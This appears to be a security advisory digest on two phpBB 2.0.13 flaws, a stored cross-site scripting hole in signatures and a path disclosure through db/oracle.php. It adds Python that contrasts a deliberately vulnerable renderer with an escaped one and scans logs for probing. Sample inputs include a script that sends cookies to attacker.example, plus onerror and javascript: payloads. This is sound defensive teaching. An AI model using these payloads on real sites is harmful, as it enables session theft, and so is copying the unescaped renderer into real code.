phpBB Signature Script Insertion Vulnerability
Paisterist has reported a vulnerability in phpBB which can be exploited by malicious (registered) users to conduct script insertion attacks. Input passed in a user's signature is not properly sanitised before being output in “privmsg.php” and “viewtopic.php”. Because the signature is stored in the user's profile and rendered wherever that user's posts or private messages are displayed, this is a persistent (stored) cross-site scripting issue: arbitrary HTML and script code placed in the signature is executed in the browser session of every user who views the malicious content, in the context of the affected site.
The vulnerability has been reported in version 2.0.13. Other versions may also be affected.
Solution: Edit the source code to ensure that input is properly sanitised.
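The following is an added illustration, not phpBB's own code or the reporter's proof of concept. It models the flaw in a few lines of Python: a signature renderer that converts a minimal BBCode subset ([b] and [url=...]) to HTML without escaping, beside a hardened version that HTML-escapes the stored signature first and only then re-introduces whitelisted markup, rejecting non-http(s) link targets. The sample signatures are constructed for the demonstration and do not come from the advisory.

```python
import html
import re
from typing import Optional

# Constructed sample signatures (illustrative only, not from the advisory or from phpBB data).
SIGNATURES = {
    "benign": "[b]Regards,[/b] see [url=http://example.com]my site[/url]",
    "script": '<script>document.location="http://attacker.example/?c="+document.cookie</script>',
    "event":  '<img src=x onerror=alert(1)>',
    "url_js": "[url=javascript:alert(1)]click[/url]",
}

# Minimal BBCode subset handled by both renderers: [b]...[/b] and [url=...]...[/url].
BOLD_RE = re.compile(r"\[b\](.*?)\[/b\]", re.DOTALL)
URL_RE = re.compile(r"\[url=([^\]]+)\](.*?)\[/url\]", re.DOTALL)

# Heuristic check used by the demo: a raw <script> tag, an on* event handler inside a tag,
# or an href pointing at a javascript: URL.
ACTIVE_RE = re.compile(
    r"<script\b|<\w+[^>]*\son\w+\s*=|<\w+[^>]*\bhref\s*=\s*[\"']?\s*javascript:",
    re.IGNORECASE,
)


def render_signature_vulnerable(sig: str) -> str:
    """Convert BBCode and interpolate the stored signature into the page unchanged.

    Any HTML in the signature becomes part of the page, and a [url=...] target is
    used as-is, which is the script insertion pattern the advisory describes."""
    out = BOLD_RE.sub(r"<b>\1</b>", sig)
    out = URL_RE.sub(r'<a href="\1">\2</a>', out)
    return f'<div class="signature">{out}</div>'


def _safe_href(raw: str) -> Optional[str]:
    """Accept only absolute http/https targets; return them attribute-escaped."""
    href = html.unescape(raw).strip()          # undo the first-pass escaping for the scheme check
    if re.match(r"^https?://", href, re.IGNORECASE):
        return html.escape(href, quote=True)   # re-escape so quotes cannot break out of the attribute
    return None


def render_signature_safe(sig: str) -> str:
    """Escape everything first, then re-introduce only whitelisted markup."""
    out = html.escape(sig, quote=True)         # neutralises <, >, &, " and ' from the user
    out = BOLD_RE.sub(r"<b>\1</b>", out)

    def url_sub(m: "re.Match[str]") -> str:
        href = _safe_href(m.group(1))
        text = m.group(2)
        if href is None:
            return text                        # drop the tag, keep the visible text
        return f'<a href="{href}">{text}</a>'

    out = URL_RE.sub(url_sub, out)
    return f'<div class="signature">{out}</div>'


def contains_active_content(rendered: str) -> bool:
    """True if the rendered HTML still carries script, event handlers or javascript: links."""
    return bool(ACTIVE_RE.search(rendered))


if __name__ == "__main__":
    for name, sig in SIGNATURES.items():
        vuln = render_signature_vulnerable(sig)
        safe = render_signature_safe(sig)
        print(f"{name:7s} vulnerable={contains_active_content(vuln)!s:5s} safe={contains_active_content(safe)}")
```

The order of operations is the point: escaping after BBCode conversion would also destroy the generated tags, while escaping first and then matching BBCode on the escaped text means the only angle brackets and quotes reaching the page are the ones the renderer itself emits. The scheme check on [url=...] closes the second hole the raw renderer leaves open, a javascript: link target.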
phpBB ‘oracle.php’ Discloses Path to Remote Users
A vulnerability was reported in phpBB's ‘oracle.php’. The file ‘phpBB/db/oracle.php’ is a database-layer script intended to be included by other phpBB scripts, not requested on its own; a remote user who requests it directly causes PHP to emit an error message that includes the full filesystem path of the installation.
HaCkZaTaN of [N]eo [S]ecurity [T]eam reported this vulnerability.
Impact: A remote user can determine the installation path.
Solution: No solution was available at the time of this entry.
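As an added detection example (not part of the advisory and not phpBB code), the Python below does two things a defender can do while no vendor fix exists: it scans web server access log lines for direct requests to include-only phpBB files, and it checks a response body for an absolute filesystem path of the kind a PHP error message leaks. The log lines and the sample error body are constructed for the example; the ‘db/’ directory comes from the advisory, while treating ‘includes/’ as include-only is an assumption based on the standard phpBB 2 layout.

```python
import re
from typing import Dict, List

# Constructed Apache combined-log lines (not real traffic, not from the advisory).
ACCESS_LOG = """\
203.0.113.7 - - [10/Mar/2005:12:00:01 +0000] "GET /phpBB/viewtopic.php?t=12 HTTP/1.1" 200 8123 "-" "Mozilla/4.0"
203.0.113.7 - - [10/Mar/2005:12:00:05 +0000] "GET /phpBB/db/oracle.php HTTP/1.1" 200 311 "-" "Mozilla/4.0"
198.51.100.2 - - [10/Mar/2005:12:01:40 +0000] "GET /phpBB/includes/functions.php HTTP/1.1" 200 287 "-" "curl/7.12"
198.51.100.2 - - [10/Mar/2005:12:01:44 +0000] "GET /phpBB/index.php HTTP/1.1" 200 15002 "-" "curl/7.12"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) '
)

# Directories holding files that are only ever include()d by other phpBB scripts.
# "/db/" is named in the advisory; "/includes/" is an assumption from the phpBB 2 tree layout.
INCLUDE_ONLY_DIRS = ("/db/", "/includes/")


def direct_include_requests(log_text: str) -> List[Dict[str, str]]:
    """Return one record per request that addresses an include-only .php file directly.

    The status code is reported but not filtered on: depending on error settings the
    leaking response may be a 200 with a warning in the body or a 500."""
    hits: List[Dict[str, str]] = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                                   # skip lines that are not combined-log format
        path = m.group("path").split("?", 1)[0]        # ignore the query string
        if path.endswith(".php") and any(d in path for d in INCLUDE_ONLY_DIRS):
            hits.append({"ip": m.group("ip"), "path": path, "status": m.group("status")})
    return hits


# Constructed response body shaped like a generic PHP warning. The exact text produced by
# phpBB 2.0.13 is not given in the advisory, so this is only a stand-in for the check below.
SAMPLE_BODY = (
    "<b>Warning</b>: some message in <b>/var/www/html/phpBB/db/oracle.php</b> on line 42<br />"
)

# Heuristic: a Unix absolute path with at least two components ending in .php, or a Windows
# drive path ending in .php. Site-relative URLs can also match, so treat hits as leads.
PATH_RE = re.compile(r"(?:/[\w.-]+){2,}\.php|[A-Za-z]:\\(?:[\w.-]+\\)+[\w.-]+\.php")


def leaked_paths(body: str) -> List[str]:
    """Return every filesystem-looking .php path found in a response body."""
    return PATH_RE.findall(body)


if __name__ == "__main__":
    for hit in direct_include_requests(ACCESS_LOG):
        print(f"direct include request from {hit['ip']}: {hit['path']} ({hit['status']})")
    print("paths in sample body:", leaked_paths(SAMPLE_BODY))
```

Running the log scan over an existing access log shows whether the file is already being probed; running the body check against your own server's response to a direct request for ‘db/oracle.php’ tells you whether your configuration actually leaks the path (for instance, a host that does not display PHP errors to clients will return an empty list).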